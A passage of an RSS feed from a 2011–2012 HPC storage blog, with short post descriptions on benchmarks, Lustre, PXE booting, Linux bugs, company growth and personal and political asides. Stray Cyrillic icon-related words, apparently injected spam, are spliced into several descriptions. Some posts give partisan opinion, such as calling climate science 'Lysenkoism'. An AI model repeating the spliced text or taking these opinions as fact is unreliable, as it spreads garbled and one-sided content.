      <description>Have a customer with a hard problem. They need to handle very high data rate traffic, VPNs, and all manner of things. Imagine a GbE in (or more). They asked us to build a firewall that could handle this. Most of the appliance firewalls have some capability, but few will really survive a serious traffic onslaught. Most use very low power processors, on purpose, because most of the time the traffic isn&amp;rsquo;t intense.</description>
    </item>
    
    <item>
      <title>SRP joy</title>
      <link>https://blog.scalability.org/2012/04/srp-joy/</link>
      <pubDate>Thu, 12 Apr 2012 14:47:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/srp-joy/</guid>
      <description>ok, not really. Late last night, while benchmarking some alternative mechanisms to connect {MD,OS}S to their respective {MD,OS}T for a Lustre design we are proposing for an RFP, I decided to revisit SRP. I liked SRP in the past, it was a simple protocol, SCSI over RDMA. How could you go wrong with this? Well, I found out last night. I put our stack on a DeltaV connected with a 10GbE and QDR IB ports to our respective switches.</description>
    </item>
    
    <item>
      <title>hadn&#39;t seen this before ... spot on though ...</title>
      <link>https://blog.scalability.org/2012/04/hadnt-seen-this-before-spot-on-though/</link>
      <pubDate>Sat, 07 Apr 2012 13:46:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/hadnt-seen-this-before-spot-on-though/</guid>
      <description>About the job prospects for your future, when you make the career and training choice to be a scientist. Or &amp;ldquo;If I knew then what I know now, I would have followed a different path&amp;rdquo;. I spent some time visiting my parents recently, and I groused to them that after ~7 years in grad school, I was, ostensibly, a PC technician. Yeah, I am running a profitable and growing company, making some of the fastest storage available.</description>
    </item>
    
    <item>
      <title>Taking siFlash-SSD out for a spin, and cracking the throttle ...</title>
      <link>https://blog.scalability.org/2012/04/taking-siflash-ssd-out-for-a-spin-and-cracking-the-throttle/</link>
      <pubDate>Wed, 04 Apr 2012 04:41:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/taking-siflash-ssd-out-for-a-spin-and-cracking-the-throttle/</guid>
      <description>&amp;hellip; half open. [update] video [FLOWPLAYER=http://scalability.org/wp-content/videos/screencast_video.flv,480,315] I won&amp;rsquo;t show the fio output until I get the unit back and get some more testing in. Also, I&amp;rsquo;ve discovered something &amp;hellip; I guess &amp;hellip; depressing about fio, in that what it reports for performance isn&amp;rsquo;t necessarily what the storage subsystem sees. This isn&amp;rsquo;t just fio, its pretty much all tools that talk to the file/storage API at a high level. The low level actual results (you have to grab data from the OS reporting infrastructure to see this) differ, sometimes wildly, from the high level API results.</description>
    </item>
    
    <item>
      <title>HPC Linux on Wall Street was fun</title>
      <link>https://blog.scalability.org/2012/04/hpc-linux-on-wall-street-was-fun/</link>
      <pubDate>Wed, 04 Apr 2012 04:26:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/hpc-linux-on-wall-street-was-fun/</guid>
      <description>Spoke to lots of interesting people. Ran some benchmarks. Will talk about those next post. Found hits on the corporate site from a Yahoo stock board. Ok, that was interesting. Had a number of great conversations &amp;hellip; before, during, and after the show. I am still in NY, working on a siCluster at a data center.</description>
    </item>
    
    <item>
      <title>Looking forward to the HPC Linux on Wall Street conference</title>
      <link>https://blog.scalability.org/2012/03/looking-forward-to-the-hpc-linux-on-wall-street-conference/</link>
      <pubDate>Thu, 29 Mar 2012 05:25:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/looking-forward-to-the-hpc-linux-on-wall-street-conference/</guid>
      <description>Will be there with a new siFlash unit. Uses some new Flash and SSD devices. Should be able to talk about that soon. Whats cool is this is our chassis. Not a COTS chassis from one of the larger vendors. This is a new chassis we worked on designing with the ODM. The unit is a prototype, and sadly the motherboard we will use for this isn&amp;rsquo;t quite in full production yet, so we are using a stand in.</description>
    </item>
    
    <item>
      <title>This is huge:  USSCSCOTUS throws out gene patents</title>
      <link>https://blog.scalability.org/2012/03/this-is-huge-ussc-throws-out-gene-patents/</link>
      <pubDate>Mon, 26 Mar 2012 21:59:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/this-is-huge-ussc-throws-out-gene-patents/</guid>
      <description>If I read this correctly, this applies to all gene patents. Which opens up genes to multiple groups trying to target specific diseases. Its good for people as it increases the likelihood that no one company can &amp;ldquo;landgrab&amp;rdquo; a set of genes implicated in various diseases and do nothing with them. Its bad for companies business models attacking these diseases, especially smaller biotech/startups. The model wasn&amp;rsquo;t sound to begin with, you cannot patent nature or natural things.</description>
    </item>
    
    <item>
      <title>Incredibly busy as usual</title>
      <link>https://blog.scalability.org/2012/03/incredibly-busy-as-usual/</link>
      <pubDate>Thu, 22 Mar 2012 00:58:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/incredibly-busy-as-usual/</guid>
      <description>I have lots of drafts in queue, just not enough time to finish them. I&amp;rsquo;ll make a concerted effort this weekend. As an update to a previous post, I managed not to collapse during my brown belt test (had some respiratory issue going on &amp;hellip; allergies, or a cold, or something). The kata were not &amp;ldquo;hard&amp;rdquo;, but they expect different things from you at higher rankings. You can&amp;rsquo;t go blasting through the kata like a robot (as I probably did with my first one).</description>
    </item>
    
    <item>
      <title>&#34;Irrevocable worldwide...&#34;</title>
      <link>https://blog.scalability.org/2012/03/irrevocable-worldwide/</link>
      <pubDate>Thu, 15 Mar 2012 19:45:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/irrevocable-worldwide/</guid>
      <description>ХудожникEvery now and then we get customers asking us to perform only services under contract. They send us what they think their T&amp;amp;C; ought to be. Yeah &amp;hellip; I especially like the lines the relieve us of our IP, our rights to collect royalties, our rights to what we develop, &amp;hellip; Yeah. Ok, maybe not so much. I have to admit, when I see this, my first reaction is to start laughing.</description>
    </item>
    
    <item>
      <title>Tiburon extensions</title>
      <link>https://blog.scalability.org/2012/03/tiburon-extensions/</link>
      <pubDate>Sat, 10 Mar 2012 22:41:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/tiburon-extensions/</guid>
      <description>Basically, I can boot quite a few Linux systems completely stateless. I like this. Makes setting up clusters drop-dead simple. Makes setting up/testing hardware similarly simple. Where I am going with this: I&amp;rsquo;ve been playing with Solaris 11, and to a lesser extent, the Illumian distros for Solaris. So far, I like what I see in Solaris 11, and I like the Debian-ed version of Solaris in the Illumian distro. For the former, I want to see if we can formally offer this on our gear.</description>
    </item>
    
    <item>
      <title>Code angry: fixing a self-inflicted bug in Tiburon</title>
      <link>https://blog.scalability.org/2012/03/code-angry-fixing-a-self-inflicted-bug-in-tiburon/</link>
      <pubDate>Sat, 10 Mar 2012 22:32:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/code-angry-fixing-a-self-inflicted-bug-in-tiburon/</guid>
      <description>I hate when I try to write generalized code up front. That is, I try to write a code base that is sufficiently generic that it works for all possible use cases. Some argue for this sort of development. I don&amp;rsquo;t like it. But I do fall into this every now and then. Tiburon suffered from some of this. I want one system to &amp;ldquo;bind them all, and in the PXE process, boot them.</description>
    </item>
    
    <item>
      <title>Cool bug in grub in Centos 6.2 (and therefore in RHEL 6.2)</title>
      <link>https://blog.scalability.org/2012/03/cool-bug-in-grub-in-centos-6-2-and-therefore-in-rhel-6-2/</link>
      <pubDate>Thu, 08 Mar 2012 05:39:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/cool-bug-in-grub-in-centos-6-2-and-therefore-in-rhel-6-2/</guid>
      <description>So if you are like us, you are a belt and suspenders person &amp;hellip; you like multiple administrative modalities. You like them because you know they are needed. Because breakage usually happens at the least opportune time, and you need a way in to express your control. So we have KVM. And we have IPMI. And we have a serial over lan (replacing the old serial consoles). If you are more that 5 miles away from the gear, you will appreciate having these multiple modes.</description>
    </item>
    
    <item>
      <title>Another step in a journey of many miles</title>
      <link>https://blog.scalability.org/2012/03/another-step-in-a-journey-of-many-miles/</link>
      <pubDate>Wed, 07 Mar 2012 20:58:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/another-step-in-a-journey-of-many-miles/</guid>
      <description>This is OT from HPC and from Storage. Sort of. The death this past week of Andrew Breitbart, whether you liked him, hated him, or hadn&amp;rsquo;t a clue who knew of him, again highlighted for me, the need to take time off, for me, every now and then. Just a few hours per week of time to get out and exercise. To burn off frustration from high on the pony scale discussions.</description>
    </item>
    
    <item>
      <title>Thought I was going nuts ...</title>
      <link>https://blog.scalability.org/2012/03/thought-i-was-going-nuts/</link>
      <pubDate>Fri, 02 Mar 2012 17:28:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/thought-i-was-going-nuts/</guid>
      <description>Ran into this earlier in the week and thought it strange. Centos 6.2, brand new installation on a box that has had Centos 5.7 installed. Set of our newer RAID cards, 10GbE, and IB cards. This is our in-lab JackRabbit JR5 machine (happily still the fastest single spinning rust machine you can get in market). As soon as I start the PXE load &amp;hellip; CRASH!!!! Kernel doesn&amp;rsquo;t panic, it just gets stuck.</description>
    </item>
    
    <item>
      <title>then comes the realization ...</title>
      <link>https://blog.scalability.org/2012/03/then-comes-the-realization/</link>
      <pubDate>Thu, 01 Mar 2012 17:08:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/03/then-comes-the-realization/</guid>
      <description>that to process all the requests, and service all the potential business we have, I&amp;rsquo;m gonna have to hire a Joe-clone (since cloning is illegal in Michigan for some reason). Possibly 2. Lets see if we get these contracts first, but this is a good problem to have. But back to the Joe-clone &amp;hellip; would we be allowed to not pay a clone of me, or provide health coverage, as they were just another instance of the &amp;ldquo;Joe&amp;rdquo; object?</description>
    </item>
    
    <item>
      <title>back from the UK, and a good reason to drink Guinness</title>
      <link>https://blog.scalability.org/2012/02/back-from-the-uk-and-a-good-reason-to-drink-guiness/</link>
      <pubDate>Sun, 26 Feb 2012 15:57:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/back-from-the-uk-and-a-good-reason-to-drink-guiness/</guid>
      <description>I enjoyed my trip. Well, not the part of being away from my family, but there is much to see/experience in London. A curious difference between London and the UK in general and the US is the apparent lack of public restrooms (or WC&amp;rsquo;s if I have the right localization). Especially in a crowded space like Covent Garden. The customers in the UK (spent time with two at their sites, on the phone with ~5 across the world, and working with ~4 via email) have good problems (not as in blocking problems, but emergent problems that occur in a variety of use cases).</description>
    </item>
    
    <item>
      <title>Check one item off my bucket list</title>
      <link>https://blog.scalability.org/2012/02/check-one-item-off-my-bucket-list/</link>
      <pubDate>Sat, 18 Feb 2012 17:14:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/check-one-item-off-my-bucket-list/</guid>
      <description>Spent the early afternoon at Westminster Abbey. Saw the tomb/memorials of Sir Issac Newton (all of physics), James Clerk-Maxwell (electromagnetic theory), Faraday (magnetism), and PAM Dirac (quantum theory). A shame they didn&amp;rsquo;t have anything for Turing (or if I missed it, lemme know and I&amp;rsquo;ll go back). Also saw memorials and tombs for Shakespeare (he&amp;rsquo;s buried at Stratford on Avon I think), Chaucer, Jane Austen, Keats, Shelley, &amp;hellip; Very nice place, highly recommend it.</description>
    </item>
    
    <item>
      <title>The blame game</title>
      <link>https://blog.scalability.org/2012/02/the-blame-game/</link>
      <pubDate>Fri, 10 Feb 2012 05:23:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/the-blame-game/</guid>
      <description>This isn&amp;rsquo;t what you might think from the title. Its an observation. I hope I don&amp;rsquo;t misstate what I intend to say, so feel free to chime in if you don&amp;rsquo;t agree with the wording. When you have a situation where a customer has a set of vendors, and a problem that needs resolution, the customer will gravitate towards assigning blame for the problem to the most competent of the vendors, the most proactive of the vendors, in the hope that it will be resolved, regardless of whether or not that vendor&amp;rsquo;s gear/stack is in any way involved.</description>
    </item>
    
    <item>
      <title>This made me chuckle a bit ... as there is at least a little truth to it ...</title>
      <link>https://blog.scalability.org/2012/02/this-made-me-chuckle-a-bit-as-there-is-at-least-a-little-truth-to-it/</link>
      <pubDate>Fri, 10 Feb 2012 05:06:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/this-made-me-chuckle-a-bit-as-there-is-at-least-a-little-truth-to-it/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Working on solving a problem for the day job</title>
      <link>https://blog.scalability.org/2012/02/working-on-solving-a-problem-for-the-day-job/</link>
      <pubDate>Mon, 06 Feb 2012 18:29:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/working-on-solving-a-problem-for-the-day-job/</guid>
      <description>Long ago, I concluded that the day job was not a bank or credit granting institution. We aren&amp;rsquo;t equity financed at this time, have no finance arm/division with capital backing to provide large credit for customers to purchase with. And we have customers. Lots of them. Many/most asking for credit terms. But we can&amp;rsquo;t really float a loan of 1/5 of our yearly revenue for 90 days as some of these opportunities would require.</description>
    </item>
    
    <item>
      <title>Well, I&#39;d call this the best commercial I saw during the game</title>
      <link>https://blog.scalability.org/2012/02/well-id-call-this-the-best-commercial-i-saw/</link>
      <pubDate>Mon, 06 Feb 2012 04:07:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/well-id-call-this-the-best-commercial-i-saw/</guid>
      <description>In part, because they weren&amp;rsquo;t overtly &amp;hellip; or even subtly &amp;hellip; selling anything.
You can see the commercials here.</description>
    </item>
    
    <item>
      <title>All hail the New York Giants ...</title>
      <link>https://blog.scalability.org/2012/02/all-hail-the-new-york-giants/</link>
      <pubDate>Mon, 06 Feb 2012 03:00:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/all-hail-the-new-york-giants/</guid>
      <description>Good game &amp;hellip; good game. Commercials were kinda lame though.</description>
    </item>
    
    <item>
      <title>Sorry about that</title>
      <link>https://blog.scalability.org/2012/02/sorry-about-that/</link>
      <pubDate>Sat, 04 Feb 2012 17:37:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/sorry-about-that/</guid>
      <description>Was working on a post about the upcoming US elections. It wasn&amp;rsquo;t ready. I had edited it a number of times, and hadn&amp;rsquo;t gotten my complete thoughts down. Managed to hit the publish button midway though. Pulled it down. It wasn&amp;rsquo;t ready for consumption. Short version: US politics, always a messy game, is going to be ugly this year. We have hard core ideologues arrayed on the (effectively 2) sides, unwilling to compromise their positions for a &amp;ldquo;greater good&amp;rdquo; of the body politic.</description>
    </item>
    
    <item>
      <title>Ahhh ... the wafting smell of election year politics ...</title>
      <link>https://blog.scalability.org/2012/02/ahhh-the-wafting-smell-of-election-year-politics/</link>
      <pubDate>Sat, 04 Feb 2012 16:04:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/ahhh-the-wafting-smell-of-election-year-politics/</guid>
      <description>СВЕТИ ГЕОРГИYeah, every few years we get some major stank drifting through our corner of the globe. This is going to be a very nasty election cycle. Very nasty. Many of the meme&amp;rsquo;s have been tried out against some of the candidates, and what stuck &amp;hellip; well &amp;hellip; stuck (and stunk). As usual, the good and bright people, the ones we need to be in office to help make hard decisions and leave &amp;hellip; once again, these folks don&amp;rsquo;t seem to want all that goes with the process.</description>
    </item>
    
    <item>
      <title>Highest sustained spinning rust write speed to date on a box</title>
      <link>https://blog.scalability.org/2012/02/highest-sustained-spinning-rust-write-speed-to-date-on-a-box/</link>
      <pubDate>Fri, 03 Feb 2012 18:41:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/highest-sustained-spinning-rust-write-speed-to-date-on-a-box/</guid>
      <description>Yeah &amp;hellip; the day job hardware. Current generation. Single box. Single thread. Single file system.
Run status group 0 (all jobs): WRITE: io=130692MB, aggrb=4702.9MB/s, minb=4815.8MB/s, maxb=4815.8MB/s, mint=27790msec, maxt=27790msec  File size is several times RAM size.Икони на светци</description>
    </item>
    
    <item>
      <title>Growth at day job last year: 60%-ish</title>
      <link>https://blog.scalability.org/2012/02/growth-at-day-job-last-year-60-ish/</link>
      <pubDate>Thu, 02 Feb 2012 15:48:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/growth-at-day-job-last-year-60-ish/</guid>
      <description>Considering the economy, the hard drive manufacturing issues in Thailand, etc. Yeah, this is pretty awesome. Gonna have a big tax bill. And yes, I am gonna grumble that the money would be better spent on ~3 new employees who would generate real economic activity, rather than sending it to the government to waste. Such is life. I don&amp;rsquo;t want to prognosticate for the year, just yet. But the trajectory we are on is making last year (our 3rd record year in a row), look &amp;hellip; mild.</description>
    </item>
    
    <item>
      <title>Busy ... as usual</title>
      <link>https://blog.scalability.org/2012/02/busy-as-usual/</link>
      <pubDate>Thu, 02 Feb 2012 15:43:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/02/busy-as-usual/</guid>
      <description>I&amp;rsquo;ve been readying a UPS ripping post (not the function, but the company). May backburner that for now. But been really REALLY busy. This is very good, in all aspects. Have lots of opportunities, many quotes out, some telegraphed orders (we know they are coming, we&amp;rsquo;ve been told, working its way through the systems), &amp;hellip; this is turning out to be a very good year, and its only 2-Feb. Hoping I have time to actually write that longer business model post.</description>
    </item>
    
    <item>
      <title>Exactly</title>
      <link>https://blog.scalability.org/2012/01/exactly/</link>
      <pubDate>Sun, 29 Jan 2012 02:15:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/exactly/</guid>
      <description>БогородицаArticle here. Its interesting that they make very similar points to what I&amp;rsquo;ve suggested in the past. Even more to the point, they bring up the very real specter of Lysenkoism rearing its ugly head &amp;hellip; but now we can call it AGW-ism or CO2-ism. If you dare disagree with those in power, you will be fired and shunned. Lack of evidentiary support be damned, full speed ahead. Lysenko set back Soviet era biology by decades.</description>
    </item>
    
    <item>
      <title>Every now and then ...</title>
      <link>https://blog.scalability.org/2012/01/every-now-and-then/</link>
      <pubDate>Tue, 24 Jan 2012 23:56:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/every-now-and-then/</guid>
      <description>Иконописwe give a quote to someone, they see a part number, find a vendor who is selling this at some enhanced discount for any number of reasons, and then ask us to match it. I am guessing that they don&amp;rsquo;t realize we actually compare our costs to various measures, and make sure our pricing is not out of whack (sometimes our suppliers just can&amp;rsquo;t seem to give us the same deals they give others, go figure).</description>
    </item>
    
    <item>
      <title>Intel snarfs up Qlogic Infiniband</title>
      <link>https://blog.scalability.org/2012/01/intel-snarfs-up-qlogic-infiniband/</link>
      <pubDate>Mon, 23 Jan 2012 19:10:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/intel-snarfs-up-qlogic-infiniband/</guid>
      <description>I guess this gets Qlogic out of the IB arena. Good catch by Rich at InsideHPC I had spoken to a number of folks at Intel over the years w.r.t. IB, and they said they were keeping their options open. IB riser boards are available for some of their MB&amp;rsquo;s, and from what I have seen, Intel has a renewed push into the MB space. Not sure about the server space in general, they&amp;rsquo;ve always had that and I think they will keep doing this (at least as a reference design basis).</description>
    </item>
    
    <item>
      <title>Fun with primes</title>
      <link>https://blog.scalability.org/2012/01/fun-with-primes/</link>
      <pubDate>Sun, 22 Jan 2012 05:42:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/fun-with-primes/</guid>
      <description>A long time ago, in a galaxy far &amp;hellip; far &amp;hellip; away &amp;hellip; I&amp;rsquo;ve been playing with primes for a while &amp;hellip; computing them, etc. Have a neat way to represent any natural number (exluding 0) in terms of the exponents of their prime factors. Lots of reasons for playing with this. Started doing this before joining SGI &amp;hellip; many moons ago, and used it as a way to entertain myself on airplanes when the laptop battery ran out.</description>
    </item>
    
    <item>
      <title>A few months into the gluster acquisition by Red Hat ...</title>
      <link>https://blog.scalability.org/2012/01/a-few-months-into-the-gluster-acquisition-by-red-hat/</link>
      <pubDate>Sat, 14 Jan 2012 16:47:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/a-few-months-into-the-gluster-acquisition-by-red-hat/</guid>
      <description>&amp;hellip; just received a note indicating that our Gluster Reseller contract was voided, and that we would be seeing a new partner portal for Red Hat Storage coming soon where we could apply again for reseller status. Hmmm &amp;hellip;. Reading over the information I saw on the Red Hat storage platform, it looks like they are going full on appliance route, which diminishes the value we can potentially add to the platform, and removes much of the differentiation we can do at the stack level (better kernels, up to date drivers, tweaked/tuned drivers/OS, &amp;hellip;).</description>
    </item>
    
    <item>
      <title>Hmmm ...</title>
      <link>https://blog.scalability.org/2012/01/hmmm/</link>
      <pubDate>Sat, 14 Jan 2012 16:06:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/hmmm/</guid>
      <description>Saw this linked from /.. UEFI boot is to be replacing the old BIOS boot. There are positives about this and negatives. New software is always buggy, and UEFI won&amp;rsquo;t magically become bug free. UEFI has security controls for signed OS booting (ostensibly to protect users). But the abuse of security systems to exclude competitive/alternative booting &amp;hellip; yeah &amp;hellip; maybe not such a good idea. It looks like Microsoft is trying to demand that its hardware ARM partners not enable anything but Windows 8 or an equivalent signed OS (is Android signed?</description>
    </item>
    
    <item>
      <title>OT: What is and what should never be</title>
      <link>https://blog.scalability.org/2012/01/ot-what-is-and-what-should-never-be/</link>
      <pubDate>Thu, 05 Jan 2012 13:59:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/ot-what-is-and-what-should-never-be/</guid>
      <description>Had to get a Led Zeppelin reference in at least once a year on the blog &amp;hellip; Pathology report came back. Ok, in the movie series The Matrix, there is a set of scenes where the story tellers want you to believe that the character (Neo in the clip below&amp;rsquo;s case) was moving with &amp;ldquo;super-human&amp;rdquo; speed, and able to move an accelerate a very large mass (their body) faster than a very tiny mass (the bullet).</description>
    </item>
    
    <item>
      <title>More than a year in, and where are they now?</title>
      <link>https://blog.scalability.org/2012/01/more-than-a-year-in-and-where-are-they-now/</link>
      <pubDate>Mon, 02 Jan 2012 15:03:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/01/more-than-a-year-in-and-where-are-they-now/</guid>
      <description>Its 2-January-2012, and assuming the Mayans&#39; were wrong (ok technically I&amp;rsquo;ve not heard of any suggestion they did anything more than stop their calendar on a convenient-for-them boundary), an interesting question is, what has happened to the company-formerly-known-as-Sun&amp;rsquo;s HPC assets? Lustre is one of the most well known, and it now has some type of future ahead of it. I&amp;rsquo;ll talk about that in a later post. This future was most definitely not assured 1 year ago, and there was considerable uncertainty in its longevity as Oracle had, about a year ago, let go most of the developers.</description>
    </item>
    
    <item>
      <title>OT:  T&#43;7 hours ... its done</title>
      <link>https://blog.scalability.org/2011/12/ot-t4-5-hours-the-waiting-is-the-hardest-part/</link>
      <pubDate>Thu, 29 Dec 2011 17:45:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/ot-t4-5-hours-the-waiting-is-the-hardest-part/</guid>
      <description>Bilateral Mastectomy with a sentinel node biopsy. The latter appears to be clean. I can exhale now. Well, mostly. The more detailed pathology data should be ready next week. The rebuilding part is in process. Another few hours. Readying some good jokes to keep the Mrs. happy. Let her know not to worry. U of M hospital guest internet is &amp;hellip; annoying. Looks like they let 3 TCP ports out to the world (22, 80, 443).</description>
    </item>
    
    <item>
      <title>Oh no, more code golf!</title>
      <link>https://blog.scalability.org/2011/12/oh-no-more-code-golf/</link>
      <pubDate>Mon, 26 Dec 2011 15:03:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/oh-no-more-code-golf/</guid>
      <description>A new code golfing site. Gaaaak! If I have time to work on such diversions, I&amp;rsquo;ll post mine under the ID numbercruncher. [update] Played with the starburst code. Have something that works (though they failed to specify their input method, or their output requirement, e.g. newlines, etc.) This is at 135 characters:
&amp;lt;code&amp;gt; $l=@a=split//,shift;$i=-1;while($i++&amp;lt; $l){map$x[$_]=&amp;quot; &amp;quot;,0..$l;$i==int$l/2?@x=@a:map$x[$_]=$a[$i],$i,$l/2,$l-$i-1;print join&amp;quot;&amp;quot;,@x,&amp;quot;\n&amp;quot;;} &amp;lt;/code&amp;gt; &amp;lt;/code&amp;gt;  which for the input &amp;ldquo;asdfd&amp;rdquo; gives
a a a sss asdfd fff d d d  among other things.</description>
    </item>
    
    <item>
      <title>This one hits it out of the park ...</title>
      <link>https://blog.scalability.org/2011/12/this-one-hits-it-out-of-the-park/</link>
      <pubDate>Fri, 23 Dec 2011 03:43:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/this-one-hits-it-out-of-the-park/</guid>
      <description>On James&#39; blog Heh. I think we&amp;rsquo;ve had and seen others have this conversation before. RAID is not a backup. Backup is very important. Ok, I did burst out laughing. The low level scan of 1PB of data to find data on the &amp;ldquo;no_backup&amp;rdquo; folder &amp;hellip; Yeah. Customer has a file system. We&amp;rsquo;ve asked them &amp;ldquo;is your data important&amp;rdquo; and they&amp;rsquo;ve answered &amp;ldquo;no&amp;rdquo;. And we try to really get whether or not its important out of them, as they didn&amp;rsquo;t spend money on a backup, and there is the potential for a single failure to take down their data.</description>
    </item>
    
    <item>
      <title>Did you ever realize you were doing something wrong?</title>
      <link>https://blog.scalability.org/2011/12/did-you-ever-realize-you-were-doing-something-wrong/</link>
      <pubDate>Thu, 22 Dec 2011 04:44:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/did-you-ever-realize-you-were-doing-something-wrong/</guid>
      <description>In a number of our tools, I&amp;rsquo;ve written rudimentary command parser hacks using getopt and some creative ARGV processing. And this almost always led to something more complex and harder to develop/maintain. For something else we are looking at, I&amp;rsquo;ve been exploring &amp;ldquo;compilers&amp;rdquo;. Basically, define a grammar to do something, then do it. Keep the grammar consistent, simple, and easy to manage. Turns out that this maps far better into our target code than I would have thought.</description>
    </item>
    
    <item>
      <title>Is Java done?</title>
      <link>https://blog.scalability.org/2011/12/is-java-done/</link>
      <pubDate>Wed, 21 Dec 2011 17:56:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/is-java-done/</guid>
      <description>Latest updates from all distro vendors. Java plugins no longer work on any browsers. Updated from Oracle, or the OpenJDK stack, or &amp;hellip; Doesn&amp;rsquo;t matter. Can&amp;rsquo;t get it to work anywhere. This is a positive development &amp;hellip; right? We can call this &amp;ldquo;experiment&amp;rdquo; over? Maybe all the nice folks who&amp;rsquo;ve been coding their IPMI/iLOM tools for years as Java clients will now &amp;hellip; please &amp;hellip; switch to HTML5 so we can drop this anachronism from our machines for once and for all?</description>
    </item>
    
    <item>
      <title>partially OT: something I am going to write about soon</title>
      <link>https://blog.scalability.org/2011/12/partially-ot-something-i-am-going-to-write-about-soon/</link>
      <pubDate>Wed, 21 Dec 2011 06:32:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/partially-ot-something-i-am-going-to-write-about-soon/</guid>
      <description>Business models and business model changes. Not ours, but a general observation I&amp;rsquo;ve made. This is oddly important for me (outside of the business) as I&amp;rsquo;ve been writing some stuff I&amp;rsquo;ve been thinking of submitting for &amp;ldquo;publication&amp;rdquo;, and what &amp;ldquo;publication&amp;rdquo; means is rapidly changing. FWIW: this is science fiction stuff. I&amp;rsquo;m an avid reader of these things (much to my wife&amp;rsquo;s dismay, given the number of books I buy), and I am enjoying writing this stuff as well.</description>
    </item>
    
    <item>
      <title>Incremental update: an extra 10-15% out of JackRabbit JR4</title>
      <link>https://blog.scalability.org/2011/12/incremental-update-an-extra-10-15-out-of-jackrabbit-jr4/</link>
      <pubDate>Tue, 20 Dec 2011 16:17:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/incremental-update-an-extra-10-15-out-of-jackrabbit-jr4/</guid>
      <description>This is nice. Our JackRabbit JR4 high performance tightly coupled storage and computing unit, 54TB usable (72TB raw). Simple 64GB uncached streaming read/write.
Run status group 0 (all jobs): READ: io=65412MB, aggrb=2515.3MB/s, minb=2575.7MB/s, maxb=2575.7MB/s, mint=26006msec, maxt=26006msec Run status group 0 (all jobs): WRITE: io=65412MB, aggrb=2619.3MB/s, minb=2682.7MB/s, maxb=2682.7MB/s, mint=24974msec, maxt=24974msec  Yeah, thats about 10-15% better performance (newer driver, updated/tuned kernel, &amp;hellip;) Nice! FWIW: some of our competitors have trouble sustaining this performance out of their storage clusters with double to quadruple the number of drives, RAIDs, etc.</description>
    </item>
    
    <item>
      <title>Finally moving to git</title>
      <link>https://blog.scalability.org/2011/12/finally-moving-to-git/</link>
      <pubDate>Sat, 17 Dec 2011 20:08:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/finally-moving-to-git/</guid>
      <description>Yeah, its taken a while. I started out many moons ago with tools like rcs/sccs, moved to the great new CVS when it came out. Then when subversion (SVN) came out later on, I happily set up a private instance, and tried learning it. Wasn&amp;rsquo;t too painful. But SVN doesn&amp;rsquo;t do collaborative development very well. Actually, &amp;ldquo;not very well&amp;rdquo; is being kind to SVN. SVK was a perl wrapper around SVN that added some of what we needed.</description>
    </item>
    
    <item>
      <title>positive signs</title>
      <link>https://blog.scalability.org/2011/12/positive-signs/</link>
      <pubDate>Thu, 15 Dec 2011 21:03:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/positive-signs/</guid>
      <description>икони цениAs the year winds to a close &amp;hellip; only 16 days left, we&amp;rsquo;re still quite busy. I am taking this as a net positive. I&amp;rsquo;ve heard lots of M&amp;amp;A; whispers over the last few months, some interesting things going on that I can&amp;rsquo;t talk about (not involving us). We&amp;rsquo;ve got lots of potential activity for Q1 lined up, and this is &amp;hellip; good. :) More soon. (Won&amp;rsquo;t have monster 7 part posts next week, but some I&amp;rsquo;ve been thinking about for a long time and have been wanting to write about)</description>
    </item>
    
    <item>
      <title>Dear Joe ...</title>
      <link>https://blog.scalability.org/2011/12/dear-joe/</link>
      <pubDate>Thu, 15 Dec 2011 17:58:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/dear-joe/</guid>
